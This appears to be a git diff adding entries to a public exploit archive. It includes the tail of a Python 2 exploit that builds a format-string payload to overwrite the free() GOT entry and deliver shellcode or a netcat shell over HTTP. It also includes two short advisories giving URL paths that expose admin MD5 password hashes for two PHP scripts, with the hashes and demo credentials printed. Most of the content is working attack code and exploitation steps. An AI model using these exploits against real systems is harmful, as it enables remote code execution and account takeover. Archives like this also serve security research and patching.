+ # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)
+ # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]
+ # ------ | |
+ # [....] -> [POP3's] | |
+ # 0x7fb99dc | @7ef2fe7c | |
+ # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX]
+ # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))
+ # -> [POP4's] |
+ # (nil) | @7ef2fe88 | [Count up to 0x20300]
+ # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)
+
+ FMScode.Add(shell)
+
+ # Write FirstWhere for 'FirstWhat'
+ FMScode.AddPOP(POP1)
+ FMScode.AddADDR(GOTint) # Run up to free() GOT address
+ FMScode.AddWRITEn(1)
+
+ # Write SecondWhere for 'SecondWhat'
+ #
+ # This is special POP with 1 byte, we can maximum POP 2!
+ #
+ # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement
+ # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.
+ # Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x
+ #
+ if POP2 != 0:
+ # We only want to write 'SecondWhat' two bytes higher at free() GOT
+ if POP2 > 2:
+ print "POP2 can't be greater than two!" 
+ sys.exit(1)
+ if POP2 == 1:
+ FMScode.Add("%2c")
+ else:
+ FMScode.Add("%1c%1c")
+ else:
+ FMScode.Add("XX")
+ FMScode.AddWRITEn(1)
+
+ # Write FirstWhat pointed by FirstWhere
+ FMScode.AddPOP(POP3) # Old Style POP's
+ FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
+ FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)
+
+ # Write SecondWhat pointed by SecondWhere
+ FMScode.AddPOP(POP4) # Old Style POP's
+ FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
+ FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
+
+ else:
+ sys.exit(1)
+
+ FMSdata = FMScode.FMSbuild()
+
+ print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))
+
+ # FMS comes here, and calculations start after '=' in the url
+ try:
+ if NCSH1 or NCSH2:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
+ else:
+ html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
+ except urllib2.HTTPError as e:
+ print "[!] Payload delivery failed:",str(e)
+ sys.exit(1)
+ except Exception as e:
+ # 1st string returned by HTTP mode, 2nd by HTTPS mode
+ if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
+ print "[i] Timeout! Payload delivered sucessfully!"
+ else:
+ print "[!] Payload delivery failed:",str(e)
+ sys.exit(1)
+
+ if noexploit:
+ print "\n[*] Not exploiting, no shell...\n"
+ else:
+ print "\n[*] All done, enjoy the shell...\n"
+
+#
+# [EOF]
+#
diff --git a/platforms/php/webapps/40126.txt b/platforms/php/webapps/40126.txt
new file mode 100755
index 000000000..0629a68c8
--- /dev/null
+++ b/platforms/php/webapps/40126.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Free News Script User Password Download File
+# Date: 2016-07-18
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns
+# Version: All Version
+# Download Link : http://www.newsp.eu/newsp.zip
+
+Exploit :
+http://site/admin/user.txt
+Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1|
+
+Username = Admin
+Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5]
diff --git a/platforms/php/webapps/40127.txt b/platforms/php/webapps/40127.txt
new file mode 100755
index 000000000..cb131d761
--- /dev/null
+++ b/platforms/php/webapps/40127.txt
@@ -0,0 +1,16 @@
+# Exploit Title: PHP calendar script Password Download File
+# Date: 2016-07-18
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
+# Version: All Version
+# Download Link : http://www.newsp.eu/calendar.zip
+
+Exploit :
+http://site/user.txt
+Admin|fe01ce2a7fbac8fafaed7c982a04e229
+Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]
+
+Test :
+Exploit : http://www.newsp.eu/demo/user.txt
+Login Url : http://www.newsp.eu/demo/login.php
+Password : demo